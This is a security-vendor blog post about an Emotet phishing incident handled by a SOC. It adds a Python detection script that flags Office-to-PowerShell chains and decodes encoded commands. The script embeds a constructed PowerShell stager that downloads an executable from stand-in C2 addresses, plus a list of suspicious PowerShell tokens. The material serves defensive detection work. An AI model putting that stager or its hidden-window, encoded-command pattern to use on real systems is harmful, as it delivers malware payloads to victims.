Emotet: What Happens When Users Open the Attachment

BlueVoyant

“Life in the SOC” is a blog series that shares experiences of the BlueVoyant SOC defending against the current and prevalent attacks encountered by our clients. The blogs discuss successful detection, response and mitigation actions that can improve your defensive capabilities.

Emotet is one of the most prolific malware families today. In Q1 2019 it accounted for over 40% of all detections by the BlueVoyant SOC. Emotet began as a banking trojan designed to steal account details, and it also steals FTP credentials and email. The stolen email is reused to disguise its own messages as legitimate communications, which is how it spreads across the network and to new victims.

Emotet has evolved in sophistication. In recent variants we have seen it act as a dropper, delivering other malware, ransomware and banking trojans (read Top 5 Cybercrimes and Prevention Tips for more on these and other cyber crimes). It is polymorphic: the binary changes with every download, which defeats signature-based detection. It can also detect when it is running in a sandbox and goes dormant to avoid analysis. Emotet is a nimble malware that employs multiple techniques for lateral movement.

In a recent attack, 48 users received a phishing email with a malicious .doc (maldoc) attached. Despite internal security training, two users opened the attachment. This ran the embedded VBA (Visual Basic for Applications) macro, infecting the two devices. Our SOC analysts saw the users open the emails and execute the maldoc. The initial investigation showed that the maldoc was not known to any threat intelligence source; the analysts determined it was malicious and immediately blacklisted it. We also observed a PowerShell script with suspicious command lines kick off on the infected devices.
As a result, the SOC immediately quarantined the infected devices to prevent the attack from moving laterally through the network. The attack took place early in the morning, and these actions were completed before the morning rush to work, preventing others from opening the malicious email. As a follow-up, we provided the client with the command-and-control (C2) IP addresses found in the VBA script; Emotet retrieves payloads and installs updates from its C2 servers. We also delivered the indicators identified in the PowerShell script to help detect and prevent future attacks.
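The detection that matters in this incident is the chain itself: an Office process spawning PowerShell, usually with an encoded command line, and C2 addresses buried in the decoded script. The following is an added example, not BlueVoyant code and not the telemetry from the incident above. It assumes Sysmon Event ID 1 style fields (ParentImage, Image, CommandLine), and the sample events and the stager script inside the encoded command are constructed for the demo, using RFC 5737 documentation addresses as stand-in C2 IPs. It flags the Office-to-script-host chain, decodes the -EncodedCommand argument, and pulls the IPs and URLs out as indicators to block and hunt on.

```python
"""Triage process-creation events for an Office -> PowerShell chain and pull C2 indicators.

Added example (not BlueVoyant code). Field names follow Sysmon Event ID 1; the sample
events and the stager script below are constructed for this demo, not real telemetry.
"""
import base64
import binascii
import re
from typing import Optional

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Lower-cased substrings that rarely appear in a legitimate Office-launched process.
SUSPICIOUS_TOKENS = ("-nop", "-noni", "-w hidden", "-windowstyle hidden", "-enc", "bypass",
                     "iex", "invoke-expression", "downloadstring", "downloadfile",
                     "net.webclient", "invoke-webrequest", "frombase64string")

# PowerShell accepts unambiguous prefixes of -EncodedCommand; -e and -enc are what maldocs use.
_ENC_RE = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")
_IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
_URL_RE = re.compile(r"https?://[^\s'\"<>]+")


def encode_command(script: str) -> str:
    """Build an -EncodedCommand argument: base64 over UTF-16LE, exactly as PowerShell expects."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plaintext behind -enc/-e, or None if the command line carries none."""
    m = _ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None  # malformed token: not valid base64 or not UTF-16LE text


def extract_indicators(text: str) -> dict:
    """Pull IPv4 addresses and URLs out of a (decoded) script for blocking and hunting."""
    return {"ips": sorted(set(_IP_RE.findall(text))),
            "urls": sorted(set(_URL_RE.findall(text)))}


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage_event(event: dict) -> Optional[dict]:
    """Flag an Office parent spawning a script host, or any encoded PowerShell command line."""
    parent, child = _basename(event["ParentImage"]), _basename(event["Image"])
    decoded = decode_encoded_command(event["CommandLine"])
    office_chain = parent in OFFICE_PARENTS and child in SCRIPT_HOSTS
    if not office_chain and decoded is None:
        return None
    # Replace the base64 blob before token matching so random base64 letters cannot match.
    stripped = _ENC_RE.sub(" -enc [...]", event["CommandLine"])
    visible = (stripped + " " + (decoded or "")).lower()
    reasons = [t for t in SUSPICIOUS_TOKENS if t in visible]
    if office_chain:
        reasons.insert(0, f"{parent} spawned {child}")
    return {"parent": parent, "child": child, "reasons": reasons, "decoded": decoded,
            "indicators": extract_indicators(decoded or event["CommandLine"])}


def triage(events: list) -> list:
    """Run triage_event over a batch and keep only the findings."""
    return [f for f in (triage_event(e) for e in events) if f]


# Hypothetical stager in the style of a maldoc: a list of C2 URLs tried in turn until one serves a payload.
_STAGER = ("$u='http://192.0.2.10/u/','http://198.51.100.25/a/';"
           "foreach($x in $u){try{(New-Object Net.WebClient).DownloadFile($x,$env:TEMP+'\\a.exe');break}catch{}}")

# Constructed sample events: one Word -> encoded PowerShell chain and two benign process launches.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -nop -w hidden -enc " + encode_command(_STAGER)},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -File C:\\scripts\\backup.ps1"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\splwow64.exe",  # print helper Word legitimately launches
     "CommandLine": "splwow64.exe"},
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding["parent"], "->", finding["child"], finding["reasons"])
        print("  C2 indicators:", finding["indicators"])
```

Only the first event produces a finding; the benign scheduled script and Word's print helper are left alone because neither matches the chain or carries an encoded command. The decoded stager yields the two C2 IPs and URLs, which is the same kind of list the SOC handed back to the client for blocking. In production the token list and the parent/child sets belong in your EDR or SIEM rule rather than in a script, and the decoded script should be kept with the alert so the analyst can see what was about to run.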